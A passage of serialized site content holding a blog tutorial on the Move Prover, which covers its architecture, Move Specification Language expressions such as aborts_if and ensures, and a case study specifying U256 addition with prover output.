",{"type":26,"tag":41,"props":11829,"children":11832},{"href":11830,"rel":11831},"https://twitter.com/notdeghost/",[45],[11833],{"type":32,"value":11834},"@notdeghost",{"type":32,"value":470},{"type":26,"tag":7949,"props":11837,"children":11838},{},[11839],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":11841},[11842,11843,11844],{"id":8343,"depth":5412,"text":8346},{"id":10381,"depth":5412,"text":10384},{"id":7892,"depth":5412,"text":7895},"content:blog:2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction.md","blog/2022-09-06-move-introduction",{"_path":11849,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":11850,"description":11851,"author":8304,"image":11852,"date":11855,"isFeatured":18,"tags":11856,"onBlogPage":18,"body":11859,"_type":5433,"_id":16204,"_source":5435,"_file":16205,"_stem":16206,"_extension":5438},"/blog/2022-09-16-move-prover","The Move Prover: A Guide","A practical guide to the Move Prover - tutorial, case study, and specifications.",{"src":11853,"height":11854,"width":8308},"/posts/move-prover/move-prover-title.jpg",1019,"2022-09-16",[11857,11858],"move","tutorial",{"type":23,"children":11860,"toc":16190},[11861,11880,11892,11898,11903,11908,11913,11922,11927,11941,11946,11952,11957,11971,11976,12113,12126,12131,12152,12186,12197,12202,12207,12217,12230,12573,12587,12605,12650,12663,12682,12854,12859,12864,12889,12894,13496,13508,13520,13525,13539,13544,13557,13597,13602,13634,13639,13644,13657,14042,14069,14276,14281,14293,14530,14535,14543,14562,14910,14915,15072,15077,15084,15098,15104,15109,15114,15120,15133,15365,15371,15376,15396,15665,15670,15676,15688,15693,15707,15713,15749,15849,15870,15876,15881,15886,16138,16143,16161,16165,16170,16175,16186],{"type":26,"tag":35,"props":11862,"children":11863},{},[11864,11866,11871,11873,11878],{"type":32,"value":11865},"Formal verification -- a powerful tool for ",{"type":26,"tag":762,"props":11867,"children":11868},{},[11869],{"type":32,"value":11870},"proving",{"type":32,"value":11872}," the correctness of your programs. How does it ",{"type":26,"tag":762,"props":11874,"children":11875},{},[11876],{"type":32,"value":11877},"actually",{"type":32,"value":11879}," work? This blog post will provide practical tips to help you use the Move Prover to its fullest potential, as well as explore a real-world example of how we used formal verification to secure a smart contract.",{"type":26,"tag":35,"props":11881,"children":11882},{},[11883,11885,11890],{"type":32,"value":11884},"At a high level, formal verification allows you to provide a specification for the program. This specification is then checked against symbolic inputs, allowing you to prove that your code follows the specification for ",{"type":26,"tag":762,"props":11886,"children":11887},{},[11888],{"type":32,"value":11889},"all",{"type":32,"value":11891}," possible inputs.",{"type":26,"tag":92,"props":11893,"children":11895},{"id":11894},"move-prover",[11896],{"type":32,"value":11897},"Move Prover",{"type":26,"tag":35,"props":11899,"children":11900},{},[11901],{"type":32,"value":11902},"The Move Prover is an automated tool that allows developers to formally verify smart contracts written in the Move programming language.",{"type":26,"tag":35,"props":11904,"children":11905},{},[11906],{"type":32,"value":11907},"Move was primarily designed to facilitate automatic verification. Interestingly, the Move Prove operates on the Move bytecode itself, avoiding potential compiler bugs from interfering with prover correctness.",{"type":26,"tag":35,"props":11909,"children":11910},{},[11911],{"type":32,"value":11912},"The architecture of the tool consists of multiple components as illustrated below.",{"type":26,"tag":35,"props":11914,"children":11915},{},[11916],{"type":26,"tag":2210,"props":11917,"children":11921},{"alt":11918,"src":11919,"title":11920},"Move Prover arch","https://i.imgur.com/ti4vkTu.png","Move Prover Architecture",[],{"type":26,"tag":35,"props":11923,"children":11924},{},[11925],{"type":32,"value":11926},"First, the Move prover receives a Move source file (an input) that contains specifications of the intended behavior of the program. Those specifications are then extracted from the annotated source by the Move Parser. Consequently, the tool compiles the source code into Move bytecode which is verified and converted into a prover object model plus the specification system \"blueprint\".",{"type":26,"tag":35,"props":11928,"children":11929},{},[11930,11932,11939],{"type":32,"value":11931},"The model is translated into an intermediate language, called ",{"type":26,"tag":41,"props":11933,"children":11936},{"href":11934,"rel":11935},"https://www.microsoft.com/en-us/research/project/boogie-an-intermediate-verification-language/",[45],[11937],{"type":32,"value":11938},"Boogie",{"type":32,"value":11940},". This Boogie code is then passed to the Boogie verification system which generates the input for the solver using a \"verification condition generation\". The verification condition (VC) is passed to an automated theorem prover (Z3).",{"type":26,"tag":35,"props":11942,"children":11943},{},[11944],{"type":32,"value":11945},"Once the VC is passed to the Z3, the prover checks if the SMT formula is unsatisfiable. If so, it means that the specifications hold. Otherwise, a model that satisfies the conditions is generated and converted back into Boogie format in order to issue a diagnosis report. The diagnosis report is then reverted to a source-level error which parallels a standard compiler error.",{"type":26,"tag":92,"props":11947,"children":11949},{"id":11948},"move-specification-language",[11950],{"type":32,"value":11951},"Move Specification Language",{"type":26,"tag":35,"props":11953,"children":11954},{},[11955],{"type":32,"value":11956},"Move MSL is a subset of the Move Language, which introduces support to statically describe the behavior about the correctness of a program with no implications on production.",{"type":26,"tag":35,"props":11958,"children":11959},{},[11960,11962,11969],{"type":32,"value":11961},"To better understand how to use the MSL, we will use ",{"type":26,"tag":41,"props":11963,"children":11966},{"href":11964,"rel":11965},"https://github.com/pontem-network/u256",[45],[11967],{"type":32,"value":11968},"Pontem's U256 library",{"type":32,"value":11970},", an open source Move library which implements support for U256 numbers, as a case study.",{"type":26,"tag":35,"props":11972,"children":11973},{},[11974],{"type":32,"value":11975},"The U256 number is implemented as a struct which contains 4 u64 numbers.",{"type":26,"tag":5512,"props":11977,"children":11979},{"code":11978,"language":5551,"meta":7,"className":5552,"style":7},"struct U256 has copy, drop, store {\n    v0: u64,\n    v1: u64,\n    v2: u64,\n    v3: u64,\n}\n",[11980],{"type":26,"tag":130,"props":11981,"children":11982},{"__ignoreMap":7},[11983,12026,12046,12066,12086,12106],{"type":26,"tag":137,"props":11984,"children":11985},{"class":5559,"line":5560},[11986,11991,11995,12000,12005,12009,12014,12018,12022],{"type":26,"tag":137,"props":11987,"children":11988},{"style":5573},[11989],{"type":32,"value":11990},"struct",{"type":26,"tag":137,"props":11992,"children":11993},{"style":6009},[11994],{"type":32,"value":7312},{"type":26,"tag":137,"props":11996,"children":11997},{"style":5584},[11998],{"type":32,"value":11999}," has",{"type":26,"tag":137,"props":12001,"children":12002},{"style":5584},[12003],{"type":32,"value":12004}," copy",{"type":26,"tag":137,"props":12006,"children":12007},{"style":5601},[12008],{"type":32,"value":1108},{"type":26,"tag":137,"props":12010,"children":12011},{"style":5584},[12012],{"type":32,"value":12013},"drop",{"type":26,"tag":137,"props":12015,"children":12016},{"style":5601},[12017],{"type":32,"value":1108},{"type":26,"tag":137,"props":12019,"children":12020},{"style":5584},[12021],{"type":32,"value":8526},{"type":26,"tag":137,"props":12023,"children":12024},{"style":5601},[12025],{"type":32,"value":5875},{"type":26,"tag":137,"props":12027,"children":12028},{"class":5559,"line":5412},[12029,12034,12038,12042],{"type":26,"tag":137,"props":12030,"children":12031},{"style":5584},[12032],{"type":32,"value":12033},"    v0",{"type":26,"tag":137,"props":12035,"children":12036},{"style":5590},[12037],{"type":32,"value":7072},{"type":26,"tag":137,"props":12039,"children":12040},{"style":6009},[12041],{"type":32,"value":8445},{"type":26,"tag":137,"props":12043,"children":12044},{"style":5601},[12045],{"type":32,"value":6099},{"type":26,"tag":137,"props":12047,"children":12048},{"class":5559,"line":5417},[12049,12054,12058,12062],{"type":26,"tag":137,"props":12050,"children":12051},{"style":5584},[12052],{"type":32,"value":12053},"    v1",{"type":26,"tag":137,"props":12055,"children":12056},{"style":5590},[12057],{"type":32,"value":7072},{"type":26,"tag":137,"props":12059,"children":12060},{"style":6009},[12061],{"type":32,"value":8445},{"type":26,"tag":137,"props":12063,"children":12064},{"style":5601},[12065],{"type":32,"value":6099},{"type":26,"tag":137,"props":12067,"children":12068},{"class":5559,"line":5642},[12069,12074,12078,12082],{"type":26,"tag":137,"props":12070,"children":12071},{"style":5584},[12072],{"type":32,"value":12073},"    v2",{"type":26,"tag":137,"props":12075,"children":12076},{"style":5590},[12077],{"type":32,"value":7072},{"type":26,"tag":137,"props":12079,"children":12080},{"style":6009},[12081],{"type":32,"value":8445},{"type":26,"tag":137,"props":12083,"children":12084},{"style":5601},[12085],{"type":32,"value":6099},{"type":26,"tag":137,"props":12087,"children":12088},{"class":5559,"line":5745},[12089,12094,12098,12102],{"type":26,"tag":137,"props":12090,"children":12091},{"style":5584},[12092],{"type":32,"value":12093},"    v3",{"type":26,"tag":137,"props":12095,"children":12096},{"style":5590},[12097],{"type":32,"value":7072},{"type":26,"tag":137,"props":12099,"children":12100},{"style":6009},[12101],{"type":32,"value":8445},{"type":26,"tag":137,"props":12103,"children":12104},{"style":5601},[12105],{"type":32,"value":6099},{"type":26,"tag":137,"props":12107,"children":12108},{"class":5559,"line":5850},[12109],{"type":26,"tag":137,"props":12110,"children":12111},{"style":5601},[12112],{"type":32,"value":6507},{"type":26,"tag":35,"props":12114,"children":12115},{},[12116,12118,12124],{"type":32,"value":12117},"Now, let's consider the ",{"type":26,"tag":130,"props":12119,"children":12121},{"className":12120},[],[12122],{"type":32,"value":12123},"add(a: U256, b: U256): U256",{"type":32,"value":12125}," function. In order to verify the correctness of such a function, it might be useful to verify some of the group axioms, for example: commutativity and associativity.",{"type":26,"tag":35,"props":12127,"children":12128},{},[12129],{"type":32,"value":12130},"Specifications are declared in a specification block, which can be found in Move functions, as module member, or in a different file as a separate specification module.",{"type":26,"tag":35,"props":12132,"children":12133},{},[12134,12136,12142,12144,12151],{"type":32,"value":12135},"For example, if your file is ",{"type":26,"tag":130,"props":12137,"children":12139},{"className":12138},[],[12140],{"type":32,"value":12141},"sources/u256.move",{"type":32,"value":12143},", you can put specifications in ",{"type":26,"tag":41,"props":12145,"children":12148},{"href":12146,"rel":12147},"https://github.com/pontem-network/u256/blob/main/sources/u256.spec.move",[45],[12149],{"type":32,"value":12150},"sources/u256.spec.move",{"type":32,"value":470},{"type":26,"tag":5512,"props":12153,"children":12155},{"code":12154,"language":5551,"meta":7,"className":5552,"style":7},"spec add { ... }\n",[12156],{"type":26,"tag":130,"props":12157,"children":12158},{"__ignoreMap":7},[12159],{"type":26,"tag":137,"props":12160,"children":12161},{"class":5559,"line":5560},[12162,12166,12171,12176,12181],{"type":26,"tag":137,"props":12163,"children":12164},{"style":5584},[12165],{"type":32,"value":10860},{"type":26,"tag":137,"props":12167,"children":12168},{"style":5584},[12169],{"type":32,"value":12170}," add",{"type":26,"tag":137,"props":12172,"children":12173},{"style":5601},[12174],{"type":32,"value":12175}," { ",{"type":26,"tag":137,"props":12177,"children":12178},{"style":5590},[12179],{"type":32,"value":12180},"...",{"type":26,"tag":137,"props":12182,"children":12183},{"style":5601},[12184],{"type":32,"value":12185}," }\n",{"type":26,"tag":35,"props":12187,"children":12188},{},[12189,12191,12196],{"type":32,"value":12190},"The specifications placed inside the specification blocks are considered ",{"type":26,"tag":762,"props":12192,"children":12193},{},[12194],{"type":32,"value":12195},"Expressions",{"type":32,"value":470},{"type":26,"tag":118,"props":12198,"children":12200},{"id":12199},"expressions",[12201],{"type":32,"value":12195},{"type":26,"tag":35,"props":12203,"children":12204},{},[12205],{"type":32,"value":12206},"Let's go over some common expressions.",{"type":26,"tag":35,"props":12208,"children":12209},{},[12210,12215],{"type":26,"tag":130,"props":12211,"children":12213},{"className":12212},[],[12214],{"type":32,"value":10910},{"type":32,"value":12216}," defines when the function can abort. This is especially useful in the context of smart contract development, where an abort would cause the entire transaction to rollback.",{"type":26,"tag":35,"props":12218,"children":12219},{},[12220,12222,12228],{"type":32,"value":12221},"For example, the ",{"type":26,"tag":130,"props":12223,"children":12225},{"className":12224},[],[12226],{"type":32,"value":12227},"add",{"type":32,"value":12229}," function aborts if and only if the U256 addition overflows. Let's put these words into an expression:",{"type":26,"tag":5512,"props":12231,"children":12233},{"code":12232,"language":5551,"meta":7,"className":5552,"style":7},"const P64: u128 = 0x10000000000000000;\n\nspec fun value_of_U256(a: U256): num {\n    a.v0 +\n    a.v1 * P64 +\n    a.v2 * P64 * P64 +\n    a.v3 * P64 * P64 * P64\n}\n\nspec add {\n    aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n}\n",[12234],{"type":26,"tag":130,"props":12235,"children":12236},{"__ignoreMap":7},[12237,12271,12278,12327,12349,12378,12415,12456,12463,12470,12485,12566],{"type":26,"tag":137,"props":12238,"children":12239},{"class":5559,"line":5560},[12240,12245,12250,12254,12258,12262,12267],{"type":26,"tag":137,"props":12241,"children":12242},{"style":5573},[12243],{"type":32,"value":12244},"const",{"type":26,"tag":137,"props":12246,"children":12247},{"style":5601},[12248],{"type":32,"value":12249}," P64",{"type":26,"tag":137,"props":12251,"children":12252},{"style":5590},[12253],{"type":32,"value":7072},{"type":26,"tag":137,"props":12255,"children":12256},{"style":6009},[12257],{"type":32,"value":11433},{"type":26,"tag":137,"props":12259,"children":12260},{"style":5590},[12261],{"type":32,"value":5593},{"type":26,"tag":137,"props":12263,"children":12264},{"style":5626},[12265],{"type":32,"value":12266}," 0x10000000000000000",{"type":26,"tag":137,"props":12268,"children":12269},{"style":5601},[12270],{"type":32,"value":5604},{"type":26,"tag":137,"props":12272,"children":12273},{"class":5559,"line":5412},[12274],{"type":26,"tag":137,"props":12275,"children":12276},{"emptyLinePlaceholder":18},[12277],{"type":32,"value":6276},{"type":26,"tag":137,"props":12279,"children":12280},{"class":5559,"line":5417},[12281,12285,12289,12294,12298,12302,12306,12310,12314,12318,12323],{"type":26,"tag":137,"props":12282,"children":12283},{"style":5584},[12284],{"type":32,"value":10860},{"type":26,"tag":137,"props":12286,"children":12287},{"style":5584},[12288],{"type":32,"value":8792},{"type":26,"tag":137,"props":12290,"children":12291},{"style":5682},[12292],{"type":32,"value":12293}," value_of_U256",{"type":26,"tag":137,"props":12295,"children":12296},{"style":5601},[12297],{"type":32,"value":165},{"type":26,"tag":137,"props":12299,"children":12300},{"style":5584},[12301],{"type":32,"value":41},{"type":26,"tag":137,"props":12303,"children":12304},{"style":5590},[12305],{"type":32,"value":7072},{"type":26,"tag":137,"props":12307,"children":12308},{"style":6009},[12309],{"type":32,"value":7312},{"type":26,"tag":137,"props":12311,"children":12312},{"style":5601},[12313],{"type":32,"value":200},{"type":26,"tag":137,"props":12315,"children":12316},{"style":5590},[12317],{"type":32,"value":7072},{"type":26,"tag":137,"props":12319,"children":12320},{"style":5584},[12321],{"type":32,"value":12322}," num",{"type":26,"tag":137,"props":12324,"children":12325},{"style":5601},[12326],{"type":32,"value":5875},{"type":26,"tag":137,"props":12328,"children":12329},{"class":5559,"line":5642},[12330,12335,12339,12344],{"type":26,"tag":137,"props":12331,"children":12332},{"style":5584},[12333],{"type":32,"value":12334},"    a",{"type":26,"tag":137,"props":12336,"children":12337},{"style":5590},[12338],{"type":32,"value":470},{"type":26,"tag":137,"props":12340,"children":12341},{"style":5601},[12342],{"type":32,"value":12343},"v0 ",{"type":26,"tag":137,"props":12345,"children":12346},{"style":5590},[12347],{"type":32,"value":12348},"+\n",{"type":26,"tag":137,"props":12350,"children":12351},{"class":5559,"line":5745},[12352,12356,12360,12365,12369,12373],{"type":26,"tag":137,"props":12353,"children":12354},{"style":5584},[12355],{"type":32,"value":12334},{"type":26,"tag":137,"props":12357,"children":12358},{"style":5590},[12359],{"type":32,"value":470},{"type":26,"tag":137,"props":12361,"children":12362},{"style":5601},[12363],{"type":32,"value":12364},"v1 ",{"type":26,"tag":137,"props":12366,"children":12367},{"style":5590},[12368],{"type":32,"value":7152},{"type":26,"tag":137,"props":12370,"children":12371},{"style":6009},[12372],{"type":32,"value":12249},{"type":26,"tag":137,"props":12374,"children":12375},{"style":5590},[12376],{"type":32,"value":12377}," +\n",{"type":26,"tag":137,"props":12379,"children":12380},{"class":5559,"line":5850},[12381,12385,12389,12394,12398,12402,12407,12411],{"type":26,"tag":137,"props":12382,"children":12383},{"style":5584},[12384],{"type":32,"value":12334},{"type":26,"tag":137,"props":12386,"children":12387},{"style":5590},[12388],{"type":32,"value":470},{"type":26,"tag":137,"props":12390,"children":12391},{"style":5601},[12392],{"type":32,"value":12393},"v2 ",{"type":26,"tag":137,"props":12395,"children":12396},{"style":5590},[12397],{"type":32,"value":7152},{"type":26,"tag":137,"props":12399,"children":12400},{"style":6009},[12401],{"type":32,"value":12249},{"type":26,"tag":137,"props":12403,"children":12404},{"style":5590},[12405],{"type":32,"value":12406}," *",{"type":26,"tag":137,"props":12408,"children":12409},{"style":6009},[12410],{"type":32,"value":12249},{"type":26,"tag":137,"props":12412,"children":12413},{"style":5590},[12414],{"type":32,"value":12377},{"type":26,"tag":137,"props":12416,"children":12417},{"class":5559,"line":5878},[12418,12422,12426,12431,12435,12439,12443,12447,12451],{"type":26,"tag":137,"props":12419,"children":12420},{"style":5584},[12421],{"type":32,"value":12334},{"type":26,"tag":137,"props":12423,"children":12424},{"style":5590},[12425],{"type":32,"value":470},{"type":26,"tag":137,"props":12427,"children":12428},{"style":5601},[12429],{"type":32,"value":12430},"v3 ",{"type":26,"tag":137,"props":12432,"children":12433},{"style":5590},[12434],{"type":32,"value":7152},{"type":26,"tag":137,"props":12436,"children":12437},{"style":6009},[12438],{"type":32,"value":12249},{"type":26,"tag":137,"props":12440,"children":12441},{"style":5590},[12442],{"type":32,"value":12406},{"type":26,"tag":137,"props":12444,"children":12445},{"style":6009},[12446],{"type":32,"value":12249},{"type":26,"tag":137,"props":12448,"children":12449},{"style":5590},[12450],{"type":32,"value":12406},{"type":26,"tag":137,"props":12452,"children":12453},{"style":6009},[12454],{"type":32,"value":12455}," P64\n",{"type":26,"tag":137,"props":12457,"children":12458},{"class":5559,"line":5891},[12459],{"type":26,"tag":137,"props":12460,"children":12461},{"style":5601},[12462],{"type":32,"value":6507},{"type":26,"tag":137,"props":12464,"children":12465},{"class":5559,"line":5909},[12466],{"type":26,"tag":137,"props":12467,"children":12468},{"emptyLinePlaceholder":18},[12469],{"type":32,"value":6276},{"type":26,"tag":137,"props":12471,"children":12472},{"class":5559,"line":5930},[12473,12477,12481],{"type":26,"tag":137,"props":12474,"children":12475},{"style":5584},[12476],{"type":32,"value":10860},{"type":26,"tag":137,"props":12478,"children":12479},{"style":5584},[12480],{"type":32,"value":12170},{"type":26,"tag":137,"props":12482,"children":12483},{"style":5601},[12484],{"type":32,"value":5875},{"type":26,"tag":137,"props":12486,"children":12487},{"class":5559,"line":5939},[12488,12493,12497,12501,12505,12509,12513,12517,12521,12525,12529,12534,12538,12542,12546,12550,12554,12558,12562],{"type":26,"tag":137,"props":12489,"children":12490},{"style":5584},[12491],{"type":32,"value":12492},"    aborts_if",{"type":26,"tag":137,"props":12494,"children":12495},{"style":5682},[12496],{"type":32,"value":12293},{"type":26,"tag":137,"props":12498,"children":12499},{"style":5601},[12500],{"type":32,"value":165},{"type":26,"tag":137,"props":12502,"children":12503},{"style":5584},[12504],{"type":32,"value":41},{"type":26,"tag":137,"props":12506,"children":12507},{"style":5601},[12508],{"type":32,"value":5671},{"type":26,"tag":137,"props":12510,"children":12511},{"style":5590},[12512],{"type":32,"value":356},{"type":26,"tag":137,"props":12514,"children":12515},{"style":5682},[12516],{"type":32,"value":12293},{"type":26,"tag":137,"props":12518,"children":12519},{"style":5601},[12520],{"type":32,"value":165},{"type":26,"tag":137,"props":12522,"children":12523},{"style":5584},[12524],{"type":32,"value":2832},{"type":26,"tag":137,"props":12526,"children":12527},{"style":5601},[12528],{"type":32,"value":5671},{"type":26,"tag":137,"props":12530,"children":12531},{"style":5590},[12532],{"type":32,"value":12533},">=",{"type":26,"tag":137,"props":12535,"children":12536},{"style":6009},[12537],{"type":32,"value":12249},{"type":26,"tag":137,"props":12539,"children":12540},{"style":5590},[12541],{"type":32,"value":12406},{"type":26,"tag":137,"props":12543,"children":12544},{"style":6009},[12545],{"type":32,"value":12249},{"type":26,"tag":137,"props":12547,"children":12548},{"style":5590},[12549],{"type":32,"value":12406},{"type":26,"tag":137,"props":12551,"children":12552},{"style":6009},[12553],{"type":32,"value":12249},{"type":26,"tag":137,"props":12555,"children":12556},{"style":5590},[12557],{"type":32,"value":12406},{"type":26,"tag":137,"props":12559,"children":12560},{"style":6009},[12561],{"type":32,"value":12249},{"type":26,"tag":137,"props":12563,"children":12564},{"style":5601},[12565],{"type":32,"value":5604},{"type":26,"tag":137,"props":12567,"children":12568},{"class":5559,"line":6191},[12569],{"type":26,"tag":137,"props":12570,"children":12571},{"style":5601},[12572],{"type":32,"value":6507},{"type":26,"tag":35,"props":12574,"children":12575},{},[12576,12578,12585],{"type":32,"value":12577},"We can observe in the snippet above, that we are allowed to call functions inside the spec block. However, the callee must either be an ",{"type":26,"tag":41,"props":12579,"children":12582},{"href":12580,"rel":12581},"https://github.com/move-language/move/blob/f7d5b1a3f4d622c17f540190fa4fa12323cb0bb8/language/move-prover/doc/user/spec-lang.md#builtin-functions",[45],[12583],{"type":32,"value":12584},"MSL function",{"type":32,"value":12586},", or a pure Move function. A pure Move function can be defined as a function that does not modify the global state or use Move expression features unsupported by MSL.",{"type":26,"tag":35,"props":12588,"children":12589},{},[12590,12592,12597,12598,12603],{"type":32,"value":12591},"A common pattern for ",{"type":26,"tag":130,"props":12593,"children":12595},{"className":12594},[],[12596],{"type":32,"value":10910},{"type":32,"value":8085},{"type":26,"tag":130,"props":12599,"children":12601},{"className":12600},[],[12602],{"type":32,"value":10918},{"type":32,"value":12604},", which lets you prove that a function will never abort.",{"type":26,"tag":5512,"props":12606,"children":12608},{"code":12607,"language":5551,"meta":7,"className":5552,"style":7},"spec critical_function {\n    aborts_if false;\n}\n",[12609],{"type":26,"tag":130,"props":12610,"children":12611},{"__ignoreMap":7},[12612,12628,12643],{"type":26,"tag":137,"props":12613,"children":12614},{"class":5559,"line":5560},[12615,12619,12624],{"type":26,"tag":137,"props":12616,"children":12617},{"style":5584},[12618],{"type":32,"value":10860},{"type":26,"tag":137,"props":12620,"children":12621},{"style":5584},[12622],{"type":32,"value":12623}," critical_function",{"type":26,"tag":137,"props":12625,"children":12626},{"style":5601},[12627],{"type":32,"value":5875},{"type":26,"tag":137,"props":12629,"children":12630},{"class":5559,"line":5412},[12631,12635,12639],{"type":26,"tag":137,"props":12632,"children":12633},{"style":5584},[12634],{"type":32,"value":12492},{"type":26,"tag":137,"props":12636,"children":12637},{"style":5573},[12638],{"type":32,"value":11645},{"type":26,"tag":137,"props":12640,"children":12641},{"style":5601},[12642],{"type":32,"value":5604},{"type":26,"tag":137,"props":12644,"children":12645},{"class":5559,"line":5417},[12646],{"type":26,"tag":137,"props":12647,"children":12648},{"style":5601},[12649],{"type":32,"value":6507},{"type":26,"tag":35,"props":12651,"children":12652},{},[12653,12655,12661],{"type":32,"value":12654},"Another type of expression that we can use is ",{"type":26,"tag":130,"props":12656,"children":12658},{"className":12657},[],[12659],{"type":32,"value":12660},"ensures",{"type":32,"value":12662},". As the name suggests, it ensures that a certain condition is true at the end of a function's execution.",{"type":26,"tag":35,"props":12664,"children":12665},{},[12666,12668,12673,12675,12680],{"type":32,"value":12667},"In the case of the ",{"type":26,"tag":130,"props":12669,"children":12671},{"className":12670},[],[12672],{"type":32,"value":12227},{"type":32,"value":12674}," function, we want to ensure that the return value is the sum of the 2 parameters. Note that because ",{"type":26,"tag":84,"props":12676,"children":12677},{},[12678],{"type":32,"value":12679},"MSL uses unbounded numbers",{"type":32,"value":12681},", we're able to very cleanly express this property without worrying about overflows.",{"type":26,"tag":5512,"props":12683,"children":12685},{"code":12684,"language":5551,"meta":7,"className":5552,"style":7},"spec add {\n    aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n    ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n}\n",[12686],{"type":26,"tag":130,"props":12687,"children":12688},{"__ignoreMap":7},[12689,12704,12783,12847],{"type":26,"tag":137,"props":12690,"children":12691},{"class":5559,"line":5560},[12692,12696,12700],{"type":26,"tag":137,"props":12693,"children":12694},{"style":5584},[12695],{"type":32,"value":10860},{"type":26,"tag":137,"props":12697,"children":12698},{"style":5584},[12699],{"type":32,"value":12170},{"type":26,"tag":137,"props":12701,"children":12702},{"style":5601},[12703],{"type":32,"value":5875},{"type":26,"tag":137,"props":12705,"children":12706},{"class":5559,"line":5412},[12707,12711,12715,12719,12723,12727,12731,12735,12739,12743,12747,12751,12755,12759,12763,12767,12771,12775,12779],{"type":26,"tag":137,"props":12708,"children":12709},{"style":5584},[12710],{"type":32,"value":12492},{"type":26,"tag":137,"props":12712,"children":12713},{"style":5682},[12714],{"type":32,"value":12293},{"type":26,"tag":137,"props":12716,"children":12717},{"style":5601},[12718],{"type":32,"value":165},{"type":26,"tag":137,"props":12720,"children":12721},{"style":5584},[12722],{"type":32,"value":41},{"type":26,"tag":137,"props":12724,"children":12725},{"style":5601},[12726],{"type":32,"value":5671},{"type":26,"tag":137,"props":12728,"children":12729},{"style":5590},[12730],{"type":32,"value":356},{"type":26,"tag":137,"props":12732,"children":12733},{"style":5682},[12734],{"type":32,"value":12293},{"type":26,"tag":137,"props":12736,"children":12737},{"style":5601},[12738],{"type":32,"value":165},{"type":26,"tag":137,"props":12740,"children":12741},{"style":5584},[12742],{"type":32,"value":2832},{"type":26,"tag":137,"props":12744,"children":12745},{"style":5601},[12746],{"type":32,"value":5671},{"type":26,"tag":137,"props":12748,"children":12749},{"style":5590},[12750],{"type":32,"value":12533},{"type":26,"tag":137,"props":12752,"children":12753},{"style":6009},[12754],{"type":32,"value":12249},{"type":26,"tag":137,"props":12756,"children":12757},{"style":5590},[12758],{"type":32,"value":12406},{"type":26,"tag":137,"props":12760,"children":12761},{"style":6009},[12762],{"type":32,"value":12249},{"type":26,"tag":137,"props":12764,"children":12765},{"style":5590},[12766],{"type":32,"value":12406},{"type":26,"tag":137,"props":12768,"children":12769},{"style":6009},[12770],{"type":32,"value":12249},{"type":26,"tag":137,"props":12772,"children":12773},{"style":5590},[12774],{"type":32,"value":12406},{"type":26,"tag":137,"props":12776,"children":12777},{"style":6009},[12778],{"type":32,"value":12249},{"type":26,"tag":137,"props":12780,"children":12781},{"style":5601},[12782],{"type":32,"value":5604},{"type":26,"tag":137,"props":12784,"children":12785},{"class":5559,"line":5417},[12786,12791,12795,12799,12803,12807,12811,12815,12819,12823,12827,12831,12835,12839,12843],{"type":26,"tag":137,"props":12787,"children":12788},{"style":5584},[12789],{"type":32,"value":12790},"    ensures",{"type":26,"tag":137,"props":12792,"children":12793},{"style":5682},[12794],{"type":32,"value":12293},{"type":26,"tag":137,"props":12796,"children":12797},{"style":5601},[12798],{"type":32,"value":165},{"type":26,"tag":137,"props":12800,"children":12801},{"style":5584},[12802],{"type":32,"value":11670},{"type":26,"tag":137,"props":12804,"children":12805},{"style":5601},[12806],{"type":32,"value":5671},{"type":26,"tag":137,"props":12808,"children":12809},{"style":5590},[12810],{"type":32,"value":11161},{"type":26,"tag":137,"props":12812,"children":12813},{"style":5682},[12814],{"type":32,"value":12293},{"type":26,"tag":137,"props":12816,"children":12817},{"style":5601},[12818],{"type":32,"value":165},{"type":26,"tag":137,"props":12820,"children":12821},{"style":5584},[12822],{"type":32,"value":41},{"type":26,"tag":137,"props":12824,"children":12825},{"style":5601},[12826],{"type":32,"value":5671},{"type":26,"tag":137,"props":12828,"children":12829},{"style":5590},[12830],{"type":32,"value":356},{"type":26,"tag":137,"props":12832,"children":12833},{"style":5682},[12834],{"type":32,"value":12293},{"type":26,"tag":137,"props":12836,"children":12837},{"style":5601},[12838],{"type":32,"value":165},{"type":26,"tag":137,"props":12840,"children":12841},{"style":5584},[12842],{"type":32,"value":2832},{"type":26,"tag":137,"props":12844,"children":12845},{"style":5601},[12846],{"type":32,"value":6430},{"type":26,"tag":137,"props":12848,"children":12849},{"class":5559,"line":5642},[12850],{"type":26,"tag":137,"props":12851,"children":12852},{"style":5601},[12853],{"type":32,"value":6507},{"type":26,"tag":35,"props":12855,"children":12856},{},[12857],{"type":32,"value":12858},"Note that because Move specification functions are written in MSL, the numbers are unbounded and we can define the expression without risk of overflow.",{"type":26,"tag":35,"props":12860,"children":12861},{},[12862],{"type":32,"value":12863},"Let's try to prove the library with the specifications from above:",{"type":26,"tag":5512,"props":12865,"children":12867},{"code":12866,"language":6822,"meta":7,"className":6823,"style":7},"$ move prove\n",[12868],{"type":26,"tag":130,"props":12869,"children":12870},{"__ignoreMap":7},[12871],{"type":26,"tag":137,"props":12872,"children":12873},{"class":5559,"line":5560},[12874,12879,12884],{"type":26,"tag":137,"props":12875,"children":12876},{"style":5682},[12877],{"type":32,"value":12878},"$",{"type":26,"tag":137,"props":12880,"children":12881},{"style":6837},[12882],{"type":32,"value":12883}," move",{"type":26,"tag":137,"props":12885,"children":12886},{"style":6837},[12887],{"type":32,"value":12888}," prove\n",{"type":26,"tag":35,"props":12890,"children":12891},{},[12892],{"type":32,"value":12893},"It outputs the following error information:",{"type":26,"tag":5512,"props":12895,"children":12897},{"code":12896,"language":6822,"meta":7,"className":6823,"style":7},"[...]\n\nerror: abort not covered by any of the `aborts_if` clauses\n╭     spec add {\n|         aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n|         ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n|     }\n╰─────^\n\n[...]\n\n at ./sources/u256.move:316: add\n enter loop, variable(s) carry, i, ret havocked and reassigned\n     carry = 54\n     i = 3792\n     ret = u256.U256{v0 = 26418, v1 = 27938, v2 = 6900, v3 = 1999}\n at ./sources/u256.move:346: add\n     ABORTED\n\nFAILURE proving 1 modules from package `u256` in 9.143s\n{\n    \"Error\": \"Move Prover failed: exiting with verification 